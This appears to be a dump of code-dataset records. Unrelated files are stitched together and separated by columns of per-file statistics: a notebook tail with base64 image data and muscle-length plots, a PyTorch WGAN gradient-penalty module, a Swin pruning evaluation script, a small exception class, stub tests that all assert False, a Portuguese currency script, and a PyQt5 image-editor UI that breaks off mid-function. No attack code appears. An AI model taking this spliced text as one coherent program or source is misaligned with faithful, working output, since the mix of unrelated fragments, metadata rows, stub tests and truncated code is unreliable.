pcU8dofDniK8ADmfm5NtcyOyJ2bSxPB44H/rVd9WTmpzJzbmbOp/7v5l8y8wPtqicidmp8oYaI2Al4O9D2b9aPM/vrGDqpvzbq6Zg+a39tG/vsKOyvY5sKfXZKBO
3MrADnAzdR/yLCNzJzebvqiYj/A9wGvD4iVkXEh9tVS8Mi4AzqnySXNR6/3aZa9gJ+HBH3UP/P+weZ2fbL/XSQ1wA/i4i7gV8A383M77e5pnFlf92iTuqvYJ8dy6Tvr2Cf3QL768Qy7n12SlzeT5IkSdrRpsSItiRJkrSjGbQlSZKkAhi0JUmSpAIYtCVJkqQCGLQlSZKkAhi0JUmSpAIYtCVpgomIXSPi3Kb1vSPi2oJe65SIuHCM7YdGxNeKeG1Jmui8jrYkTTARMR/4p8x80w54rVuBkzLzmTH2+SHwocx8rOh6JGkicURbkiaevwL2b9xl7uKImB8R9wFExAcj4vqI+E5EPBIR50fExyPiroi4PSJ2a+y3f0R8PyLuiIifRsQbhr9IRBwE9A+F7Ig4NSLui4i7I+InTbt+h/rtkyVJTQzakjTxXAA8lJkLMvMTI2x/E3A6cBTwl8C6zDyC+m2pf7+xzxXAf8rMNwN/DFw6wnkWAXc2rV8InJCZhwMnNbUvBX59O96PJE1KXe0uQJI07n6cmS8DL0fEi9RHnAHuBQ6LiBnAscA1ETF0TO8I59kLWNO0fgvwtYj4BvDNpvangb3HsX5JmhQM2pI0+fQ3Ldea1mvU/98vAS9k5oItnGc9sMvQSmaeHRFHA+8ElkXEgsx8FpjW2FeS1MSpI5I08bwMzNzWgzPzJeCRiDgVIOoOH2HXB4ADhlYiYv/M/HlmXgg8A8xrbDoIuG9b65GkycqgLUkTTGMU+ZbGFxMv3sbTvB/4cETcDSwHTh5hn58AR8Sm+SUXR8S9jS9e/gS4u9H+m8B3t7EOSZq0vLyfJGlUEfEF4DuZ+cNRtvcC/w/4tcys7NDiJKnDOaItSRrLfwf6xti+D3CBIVuSXs0RbUmSJKkAjmhLkiRJBTBoS5IkSQUwaEuSJEkFMGhLkiRJBTBoS5IkSQX4/yqbv35hIEZTAAAAAElFTkSuQmCC\n",
"text/plain": [
"<matplotlib.figure.Figure at 0x7fc79c1c3160>"
]
},
"metadata": {},
"output_type": "display_data"
}
],
"source": [
"fig, ax = plt.subplots(1, 1, figsize=(6,6), sharex=True)\n",
"\n",
"ax.plot(t,FiberLen, label = 'fiber')\n",
"ax.plot(t,TendonLen, label = 'tendon')\n",
"plt.grid()\n",
"plt.xlabel('time (s)')\n",
"plt.ylabel('Length (m)')\n",
"ax.legend(loc='best')\n",
"\n",
"\n",
"fig, ax = plt.subplots(1, 3, figsize=(12,4), sharex=True, sharey=True)\n",
"ax[0].plot(t,FiberLen, label = 'fiber')\n",
"ax[1].plot(t,TendonLen, label = 'tendon')\n",
"ax[2].plot(t,FiberLen + TendonLen, label = 'muscle (tendon + fiber)')\n",
"\n",
"ax[1].set_xlabel('time (s)')\n",
"ax[0].set_ylabel('Length (m)')\n",
"#plt.legend(loc='best')"
]
},
{
"cell_type": "code",
"execution_count": null,
"metadata": {},
"outputs": [],
"source": []
},
{
"cell_type": "code",
"execution_count": null,
"metadata": {},
"outputs": [],
"source": []
}
],
"metadata": {
"kernelspec": {
"display_name": "Python 3",
"language": "python",
"name": "python3"
},
"language_info": {
"codemirror_mode": {
"name": "ipython",
"version": 3
},
"file_extension": ".py",
"mimetype": "text/x-python",
"name": "python",
"nbconvert_exporter": "python",
"pygments_lexer": "ipython3",
"version": "3.6.3"
},
"latex_envs": {
"LaTeX_envs_menu_present": true,
"autoclose": false,
"autocomplete": true,
"bibliofile": "biblio.bib",
"cite_by": "apalike",
"current_citInitial": 1,
"eqLabelWithNumbers": true,
"eqNumInitial": 1,
"hotkeys": {
"equation": "Ctrl-E",
"itemize": "Ctrl-I"
},
"labels_anchors": false,
"latex_user_defs": false,
"report_style_numbering": false,
"user_envs_cfg": false
},
"nbTranslate": {
"displayLangs": [
"*"
],
"hotkey": "alt-t",
"langInMainMenu": true,
"sourceLang": "en",
"targetLang": "fr",
"useGoogleTranslate": true
}
},
"nbformat": 4,
"nbformat_minor": 2
}
| 135.276144
| 19,504
| 0.878571
| 3,797
| 82,789
| 19.109297
| 0.607585
| 0.002508
| 0.000703
| 0.00492
| 0.054577
| 0.042228
| 0.037019
| 0.030789
| 0.029163
| 0.023788
| 0
| 0.138889
| 0.055962
| 82,789
| 612
| 19,505
| 135.276144
| 0.789485
| 0
| 0
| 0.49183
| 0
| 0.027778
| 0.937819
| 0.832021
| 0
| 1
| 0.000846
| 0
| 0
| 1
| 0
| true
| 0
| 0.006536
| 0
| 0.006536
| 0.006536
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
78cdbbfb7e312f827587d9414b1b3a9f0af33882
| 1,669
|
py
|
Python
|
torchbot/models/wgan_utils.py
|
stevehuanghe/torch_bot
|
443413116fa731c07c83ca2d7b5dacd2202ce9cb
|
[
"MIT"
] | null | null | null |
torchbot/models/wgan_utils.py
|
stevehuanghe/torch_bot
|
443413116fa731c07c83ca2d7b5dacd2202ce9cb
|
[
"MIT"
] | null | null | null |
torchbot/models/wgan_utils.py
|
stevehuanghe/torch_bot
|
443413116fa731c07c83ca2d7b5dacd2202ce9cb
|
[
"MIT"
] | null | null | null |
import torch
import torch.nn as nn
import torch.autograd as autograd
import torch.nn.functional as F
def calc_gradient_penalty(netD, real_data, fake_data, lambda_gp=10.0):
    """Compute the WGAN-GP gradient penalty (Gulrajani et al., 2017).

    Samples points uniformly along straight lines between paired real and
    fake samples and penalizes the discriminator's gradient norm at those
    points for deviating from 1.

    Args:
        netD: discriminator module/callable, invoked as ``netD(x)``.
        real_data: tensor of real samples, shape ``(batch, ...)``.
        fake_data: tensor of generated samples, same shape as ``real_data``.
        lambda_gp: penalty coefficient (default 10.0, as in the paper).

    Returns:
        Scalar tensor ``lambda_gp * mean((||grad||_2 - 1) ** 2)``.
    """
    batch_size = real_data.size(0)
    device = real_data.device
    # One interpolation coefficient per sample, shaped (batch, 1, 1, ...)
    # so it broadcasts over any number of trailing dimensions.  The
    # previous (batch, 1) + expand() only worked for strictly 2-D inputs.
    alpha = torch.rand(batch_size, *([1] * (real_data.dim() - 1)), device=device)
    interpolates = (alpha * real_data + (1.0 - alpha) * fake_data).requires_grad_(True)
    disc_interpolates = netD(interpolates)
    # ones_like keeps dtype/device consistent with the discriminator output.
    grad_outputs = torch.ones_like(disc_interpolates)
    gradients = autograd.grad(outputs=disc_interpolates, inputs=interpolates,
                              grad_outputs=grad_outputs,
                              create_graph=True, retain_graph=True, only_inputs=True)[0]
    # Flatten per-sample gradients before taking the norm; norm(dim=1)
    # alone is wrong for inputs with more than two dimensions.
    gradients = gradients.reshape(batch_size, -1)
    gradient_penalty = ((gradients.norm(2, dim=1) - 1) ** 2).mean() * lambda_gp
    return gradient_penalty
def calc_gradient_penalty_cd(netD, real_data, fake_data, labels, lambda_gp=10.0):
    """Compute the WGAN-GP gradient penalty for a conditional discriminator.

    Identical to :func:`calc_gradient_penalty` except the discriminator is
    conditioned on ``labels``: it is invoked as ``netD(x, labels)``.  The
    penalty is taken with respect to the interpolated inputs only.

    Args:
        netD: conditional discriminator, invoked as ``netD(x, labels)``.
        real_data: tensor of real samples, shape ``(batch, ...)``.
        fake_data: tensor of generated samples, same shape as ``real_data``.
        labels: conditioning information forwarded to ``netD`` unchanged.
        lambda_gp: penalty coefficient (default 10.0).

    Returns:
        Scalar tensor ``lambda_gp * mean((||grad||_2 - 1) ** 2)``.
    """
    batch_size = real_data.size(0)
    device = real_data.device
    # Per-sample coefficient shaped (batch, 1, 1, ...) so it broadcasts
    # over inputs of any rank; the old (batch, 1) + expand() required 2-D.
    alpha = torch.rand(batch_size, *([1] * (real_data.dim() - 1)), device=device)
    interpolates = (alpha * real_data + (1.0 - alpha) * fake_data).requires_grad_(True)
    disc_interpolates = netD(interpolates, labels)
    grad_outputs = torch.ones_like(disc_interpolates)
    gradients = autograd.grad(outputs=disc_interpolates, inputs=interpolates,
                              grad_outputs=grad_outputs,
                              create_graph=True, retain_graph=True, only_inputs=True)[0]
    # Flatten before the norm so multi-dimensional samples are handled.
    gradients = gradients.reshape(batch_size, -1)
    gradient_penalty = ((gradients.norm(2, dim=1) - 1) ** 2).mean() * lambda_gp
    return gradient_penalty
| 36.282609
| 89
| 0.674655
| 219
| 1,669
| 4.917808
| 0.214612
| 0.07428
| 0.044568
| 0.040854
| 0.869081
| 0.831941
| 0.831941
| 0.831941
| 0.831941
| 0.831941
| 0
| 0.018237
| 0.211504
| 1,669
| 46
| 90
| 36.282609
| 0.800152
| 0
| 0
| 0.75
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.0625
| false
| 0
| 0.125
| 0
| 0.25
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
78d5cbb89c55d44793abcc61d44dac0b7b3fc2b6
| 3,691
|
py
|
Python
|
multiprune/multiprune.py
|
5joono/Swin-Transformer
|
b5b7e85aa11ad72b2bec2d458fa78066e4c3d0f2
|
[
"MIT"
] | null | null | null |
multiprune/multiprune.py
|
5joono/Swin-Transformer
|
b5b7e85aa11ad72b2bec2d458fa78066e4c3d0f2
|
[
"MIT"
] | null | null | null |
multiprune/multiprune.py
|
5joono/Swin-Transformer
|
b5b7e85aa11ad72b2bec2d458fa78066e4c3d0f2
|
[
"MIT"
] | null | null | null |
import os

import numpy as np
import pandas as pd

os.environ['MKL_THREADING_LAYER'] = 'GNU'

# Common invocation: single-process distributed evaluation of the
# Swin-Tiny checkpoint.  Only the --prune argument varies per run.
_BASE_CMD = (
    'python -m torch.distributed.launch --nproc_per_node 1 --master_port 12345 '
    'main.py --eval --cfg configs/swin_tiny_patch4_window7_224.yaml '
    '--resume swin_tiny_patch4_window7_224.pth --data-path data/imagenet/'
)

# Pruning configurations to evaluate, one per run.  Format appears to be
# <k>_<per-layer head indices>_999_999 with k heads pruned per layer —
# TODO confirm against main.py's --prune parser.
_PRUNE_CONFIGS = [
    '1_7.11.0.7.9.9_999_999',
    '2_1+7.11+4.0+3.8+7.9+6.9+11_999_999',
    '3_8+1+7.1+11+4.0+3+5.8+2+7.9+2+6.9+11+6_999_999',
    '4_8+1+4+7.3+1+11+4.0+10+3+5.8+2+5+7.9+2+11+6.3+9+11+6_999_999',
    '5_1+4+6+7+8.1+3+4+6+11.0+3+5+8+10.1+2+5+7+8.2+6+7+9+11.3+6+7+9+11_999_999',
    '6_1+4+6+7+8+10.0+1+3+4+6+11.0+3+5+7+8+10.1+2+4+5+7+8.2+3+6+7+9+11.3+6+7+9+10+11_999_999',
    '7_1+4+5+6+7+8+10.0+1+2+3+4+6+11.0+3+4+5+7+8+10.1+2+3+4+5+7+8.2+3+4+6+7+9+11.1+3+6+7+9+10+11_999_999',
    '8_1+3+4+5+6+7+8+10.0+1+2+3+4+6+8+11.0+1+3+4+5+7+8+10.1+2+3+4+5+7+8+11.2+3+4+6+7+8+9+11.1+3+5+6+7+9+10+11_999_999',
    '9_1+3+4+5+6+7+8+10+11.0+1+2+3+4+6+8+9+11.0+1+3+4+5+7+8+9+10.1+2+3+4+5+6+7+8+11.0+2+3+4+6+7+8+9+11.1+3+5+6+7+8+9+10+11_999_999',
    '10_1+3+4+5+6+7+8+9+10+11.0+1+2+3+4+6+8+9+10+11.0+1+3+4+5+6+7+8+9+10.0+1+2+3+4+5+6+7+8+11.0+1+2+3+4+6+7+8+9+11.0+1+3+5+6+7+8+9+10+11_999_999',
    '11_1+2+3+4+5+6+7+8+9+10+11.0+1+2+3+4+6+7+8+9+10+11.0+1+2+3+4+5+6+7+8+9+10.0+1+2+3+4+5+6+7+8+9+11.0+1+2+3+4+6+7+8+9+10+11.0+1+2+3+5+6+7+8+9+10+11_999_999',
]


def main():
    """Reset the results CSV, then evaluate every pruning configuration."""
    # Each evaluated run is expected to append a row with these columns.
    df = pd.DataFrame(columns=['multiprune', 'headstr', 'pluslayer', 'plushead', 'acc1'])
    df.to_csv("multiprune.csv", index=False)
    for prune in _PRUNE_CONFIGS:
        os.system(f'{_BASE_CMD} --prune {prune}')


if __name__ == '__main__':
    main()
| 175.761905
| 380
| 0.742075
| 879
| 3,691
| 2.937429
| 0.076223
| 0.021689
| 0.119287
| 0.178931
| 0.9055
| 0.901627
| 0.890008
| 0.889233
| 0.867932
| 0.867157
| 0
| 0.20431
| 0.057166
| 3,691
| 20
| 381
| 184.55
| 0.537644
| 0
| 0
| 0
| 0
| 0.647059
| 0.915989
| 0.547154
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.176471
| 0
| 0.176471
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 12
|
15334a422b61b2077f52a6752ab49e7bc78d0d25
| 194
|
py
|
Python
|
portal_gun/commands/exceptions.py
|
Coderik/portal-gun
|
081020a46b16b649497bceb6c2435b1ba135b487
|
[
"MIT"
] | 69
|
2018-05-03T18:25:43.000Z
|
2021-02-10T11:37:28.000Z
|
portal_gun/commands/exceptions.py
|
Coderik/portal-gun
|
081020a46b16b649497bceb6c2435b1ba135b487
|
[
"MIT"
] | 7
|
2018-09-19T06:39:11.000Z
|
2022-03-29T21:55:08.000Z
|
portal_gun/commands/exceptions.py
|
Coderik/portal-gun
|
081020a46b16b649497bceb6c2435b1ba135b487
|
[
"MIT"
] | 11
|
2018-07-30T18:09:12.000Z
|
2019-10-03T15:36:13.000Z
|
class CommandError(Exception):
	"""Error raised by portal-gun commands; carries a human-readable message."""

	def __init__(self, message):
		super(CommandError, self).__init__(message)
		# Python 3's BaseException does not define `.message`, so store it
		# explicitly for __str__/__repr__ below (the original relied on a
		# nonexistent attribute and crashed in repr()).
		self.message = message

	def __str__(self):
		# Bug fix: the original defined `__srt__` (typo), so str() never used
		# the message and repr() raised AttributeError on `.message`.
		return self.message

	def __repr__(self):
		return self.message
| 19.4
| 45
| 0.757732
| 24
| 194
| 5.458333
| 0.458333
| 0.251908
| 0.21374
| 0.320611
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.134021
| 194
| 9
| 46
| 21.555556
| 0.779762
| 0
| 0
| 0.285714
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.428571
| false
| 0
| 0
| 0.285714
| 0.857143
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 8
|
156fc46a2c0e3320cf0ceccc3d93a6a8adc5b6e9
| 1,932
|
py
|
Python
|
pykin/geometry/geometry.py
|
jdj2261/pykin
|
da952b8ec023382b8a324d1095b0cfd675c7452b
|
[
"MIT"
] | 14
|
2021-08-09T06:59:10.000Z
|
2022-03-09T13:05:46.000Z
|
pykin/geometry/geometry.py
|
jdj2261/pykin
|
da952b8ec023382b8a324d1095b0cfd675c7452b
|
[
"MIT"
] | null | null | null |
pykin/geometry/geometry.py
|
jdj2261/pykin
|
da952b8ec023382b8a324d1095b0cfd675c7452b
|
[
"MIT"
] | 4
|
2021-12-13T03:23:36.000Z
|
2022-03-09T11:34:29.000Z
|
from pykin.kinematics.transform import Transform
class Visual:
    """
    Visual geometry attached to a robot link.

    Args:
        offset (Transform): visual offset relative to the link frame
        geom_type (str): visual type (box, cylinder, sphere, mesh)
        geom_param (dict): visual parameters
    """
    # Supported geometry type identifiers.
    TYPES = ['box', 'cylinder', 'sphere', 'mesh']
    def __init__(
        self,
        offset=Transform(),
        geom_type=None,
        geom_param=None
    ):
        # NOTE(review): the default Transform() is built once at class
        # definition time; safe here only because the `offset` setter below
        # rebuilds a fresh Transform on every assignment.
        self.offset = offset
        self.gtype = geom_type
        self.gparam = geom_param
    def __str__(self):
        return f"""Visual(offset={self.offset},
geom_type={self.gtype},
geom_param={self.gparam})"""
    def __repr__(self):
        return 'pykin.geometry.geometry.{}()'.format(type(self).__name__)
    @property
    def offset(self):
        # Offset of the visual geometry (a Transform).
        return self._offset
    @offset.setter
    def offset(self, offset):
        # Always normalize to a new Transform built from pos and rot.
        self._offset = Transform(offset.pos, offset.rot)
class Collision:
    """
    Collision geometry attached to a robot link.

    Args:
        offset (Transform): collision offset relative to the link frame
        geom_type (str): collision type (box, cylinder, sphere, mesh)
        geom_param (dict): collision parameters
    """
    # Supported geometry type identifiers.
    TYPES = ['box', 'cylinder', 'sphere', 'mesh']
    def __init__(
        self,
        offset=Transform(),
        geom_type=None,
        geom_param=None
    ):
        # NOTE(review): the default Transform() is built once at class
        # definition time; safe here only because the `offset` setter below
        # rebuilds a fresh Transform on every assignment.
        self.offset = offset
        self.gtype = geom_type
        self.gparam = geom_param
    def __str__(self):
        return f"""Collision(offset={self.offset},
geom_type={self.gtype},
geom_param={self.gparam})"""
    def __repr__(self):
        return 'pykin.geometry.geometry.{}()'.format(type(self).__name__)
    @property
    def offset(self):
        # Offset of the collision geometry (a Transform).
        return self._offset
    @offset.setter
    def offset(self, offset):
        # Always normalize to a new Transform built from pos and rot.
        self._offset = Transform(offset.pos, offset.rot)
| 25.76
| 73
| 0.56677
| 204
| 1,932
| 5.112745
| 0.191176
| 0.115053
| 0.092042
| 0.032598
| 0.780441
| 0.780441
| 0.780441
| 0.780441
| 0.707574
| 0.707574
| 0
| 0
| 0.314182
| 1,932
| 75
| 74
| 25.76
| 0.78717
| 0.177019
| 0
| 0.893617
| 0
| 0
| 0.24427
| 0.138179
| 0
| 0
| 0
| 0
| 0
| 1
| 0.212766
| false
| 0
| 0.021277
| 0.12766
| 0.446809
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
|
0
| 8
|
15b205fa861b08fd926516fefd5eca31d984d4bf
| 670
|
py
|
Python
|
umapi_client/test/tests.py
|
wikimedia/umapi_client
|
76e56f17055dc8eb3d0584af9d5519d7b8359c14
|
[
"BSD-3-Clause"
] | 1
|
2017-09-03T21:33:21.000Z
|
2017-09-03T21:33:21.000Z
|
umapi_client/test/tests.py
|
dartar/umapi_client
|
76e56f17055dc8eb3d0584af9d5519d7b8359c14
|
[
"BSD-3-Clause"
] | null | null | null |
umapi_client/test/tests.py
|
dartar/umapi_client
|
76e56f17055dc8eb3d0584af9d5519d7b8359c14
|
[
"BSD-3-Clause"
] | null | null | null |
"""
Implement tests for umapi_client.
"""
def test_good_request_no_params_raw():
assert False # TODO: implement your test here
def test_good_request_no_params_agg():
assert False # TODO: implement your test here
def test_good_request_no_params_ts():
assert False # TODO: implement your test here
def test_good_request_with_params_raw():
assert False # TODO: implement your test here
def test_good_request_with_params_agg():
assert False # TODO: implement your test here
def test_good_request_with_params_ts():
assert False # TODO: implement your test here
def test_bad_request():
assert False # TODO: implement your test here
| 24.814815
| 50
| 0.758209
| 100
| 670
| 4.75
| 0.21
| 0.103158
| 0.221053
| 0.353684
| 0.92
| 0.92
| 0.877895
| 0.802105
| 0.802105
| 0.802105
| 0
| 0
| 0.179104
| 670
| 26
| 51
| 25.769231
| 0.863636
| 0.374627
| 0
| 0.5
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.038462
| 0.5
| 1
| 0.5
| true
| 0
| 0
| 0
| 0.5
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 12
|
ecc0995e8eadfd478975e8e7e053cc2cb9e27f75
| 397
|
py
|
Python
|
modulos/Moeda/Moeda.py
|
matewszz/Python
|
18b7fc96d3ed294d2002ed484941a0ee8cf18108
|
[
"MIT"
] | null | null | null |
modulos/Moeda/Moeda.py
|
matewszz/Python
|
18b7fc96d3ed294d2002ed484941a0ee8cf18108
|
[
"MIT"
] | null | null | null |
modulos/Moeda/Moeda.py
|
matewszz/Python
|
18b7fc96d3ed294d2002ed484941a0ee8cf18108
|
[
"MIT"
] | null | null | null |
import Projeto
# Read a value and report its half, double, +10% and -13% variants, each
# formatted as currency by the Projeto helper module.
valor = float(input('Digite um valor: '))
for modelo, funcao in (
    ('A metadade de {0} é {1}.', Projeto.metade),
    ('O dobro de {0} é {1}.', Projeto.dobro),
    ('Aumentando 10% de {0}, temos {1}.', Projeto.aumentar),
    ('Diminuindo 13% de {0}, temos {1}.', Projeto.diminuir),
):
    print(modelo.format(Projeto.moeda(valor), Projeto.moeda(funcao(valor))))
| 44.111111
| 91
| 0.702771
| 64
| 397
| 4.359375
| 0.390625
| 0.344086
| 0.200717
| 0.215054
| 0.530466
| 0.530466
| 0.530466
| 0.530466
| 0
| 0
| 0
| 0.011019
| 0.085642
| 397
| 8
| 92
| 49.625
| 0.757576
| 0
| 0
| 0
| 0
| 0.666667
| 0.793451
| 0.360202
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.166667
| 0
| 0.166667
| 0.666667
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 7
|
01d72a73810e26c5a4fcc2b0a36023e0f058e43c
| 94,002
|
py
|
Python
|
com/zeketian/imageutil/ui/MainUI.py
|
ZekeTian/ImageUtils
|
af2adfe8b4457cae95e2bb6a0a4200ca5611344d
|
[
"Apache-2.0"
] | 3
|
2021-03-15T15:17:06.000Z
|
2021-04-23T02:07:21.000Z
|
com/zeketian/imageutil/ui/MainUI.py
|
ZekeTian/ImageUtils
|
af2adfe8b4457cae95e2bb6a0a4200ca5611344d
|
[
"Apache-2.0"
] | null | null | null |
com/zeketian/imageutil/ui/MainUI.py
|
ZekeTian/ImageUtils
|
af2adfe8b4457cae95e2bb6a0a4200ca5611344d
|
[
"Apache-2.0"
] | 1
|
2020-12-28T09:15:52.000Z
|
2020-12-28T09:15:52.000Z
|
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'main-ui.ui'
#
# Created by: PyQt5 UI code generator 5.13.0
#
# WARNING! All changes made in this file will be lost!
import cv2
from PyQt5 import QtCore, QtGui, QtWidgets
import os
import copy
from PyQt5.QtCore import Qt
from PyQt5.QtGui import QImage, QPixmap, QGuiApplication, QCursor, QColor
from PyQt5.QtWidgets import QFileDialog, QGraphicsPixmapItem, QGraphicsScene, QSlider, QApplication, QInputDialog, \
QLineEdit, QMessageBox
from com.zeketian.imageutil.control.BasicProcessingUtil import *
from com.zeketian.imageutil.ui.CustomLabel import ImageLabel
from com.zeketian.imageutil.ui.CustomDialog import *
from com.zeketian.imageutil.ui.ColorCatcher import ColorCatcher
class MainWindow(object):
    def setupUi(self, MainWindow):
        """Configure the main window: size, font, widgets and slider wiring.

        Args:
            MainWindow: the top-level Qt widget being configured.
        """
        MainWindow.setObjectName("MainWindow")
        MainWindow.resize(926, 806)
        font = QtGui.QFont()
        font.setPointSize(10)
        MainWindow.setFont(font)
        # Window icon resolved relative to the current working directory.
        self.__icon_path = "{0}/ui/edit_image.png".format(os.getcwd())
        self.create_widget(MainWindow)
        self.retranslateUi(MainWindow)
        # Show the lightness slider on demand; each slider hides itself again
        # once the user releases it.
        self.btn_lightness.clicked.connect(self.slider_lightness.show)
        self.slider_lightness.sliderReleased.connect(self.slider_lightness.hide)
        self.slider_blur.sliderReleased.connect(self.slider_blur.hide)
        self.slider_compress.sliderReleased.connect(self.slider_compress.hide)
        # Basic state initialized along with the UI
        self.__current_img = None # currently displayed image
        self.__original_img = None # original (unmodified) image
        self.__last_img = None # image from the previous operation
        self.__current_operation = None # records the current operation
        self.__lightness_max = 100
        self.__lightness_min = -100
        self.slider_lightness.setMaximum(100)
        self.slider_lightness.setMinimum(-100)
        self.slider_lightness.setTickPosition(QSlider.TicksBelow) # draw tick marks below the slider
        self.slider_lightness.setTickInterval(5) # tick mark spacing
        self.slider_lightness.hide()
        self.slider_blur.hide()
        self.slider_compress.hide()
        self.btn_screenshot.hide()
        self.control.hide()
        QtCore.QMetaObject.connectSlotsByName(MainWindow)
def create_widget(self, MainWindow):
self.centralwidget = QtWidgets.QWidget(MainWindow)
self.centralwidget.setStyleSheet("background: rgb(30, 30, 30)")
self.centralwidget.setObjectName("centralwidget")
self.verticalLayout_3 = QtWidgets.QVBoxLayout(self.centralwidget)
self.verticalLayout_3.setContentsMargins(2, 2, 2, 2)
self.verticalLayout_3.setSpacing(0)
self.verticalLayout_3.setObjectName("verticalLayout_3")
self.title = QtWidgets.QFrame(self.centralwidget)
self.title.setMinimumSize(QtCore.QSize(0, 55))
self.title.setMaximumSize(QtCore.QSize(188888, 55))
self.title.setStyleSheet("background: rgb(60, 60, 60)")
self.title.setFrameShape(QtWidgets.QFrame.StyledPanel)
self.title.setFrameShadow(QtWidgets.QFrame.Raised)
self.title.setObjectName("title")
self.horizontalLayout_4 = QtWidgets.QHBoxLayout(self.title)
self.horizontalLayout_4.setObjectName("horizontalLayout_4")
self.icon = QtWidgets.QToolButton(self.title)
self.icon.setMinimumSize(QtCore.QSize(90, 45))
self.icon.setMaximumSize(QtCore.QSize(90, 45))
palette = QtGui.QPalette()
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255, 128))
brush.setStyle(QtCore.Qt.NoBrush)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.PlaceholderText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255, 128))
brush.setStyle(QtCore.Qt.NoBrush)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.PlaceholderText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Button, brush)
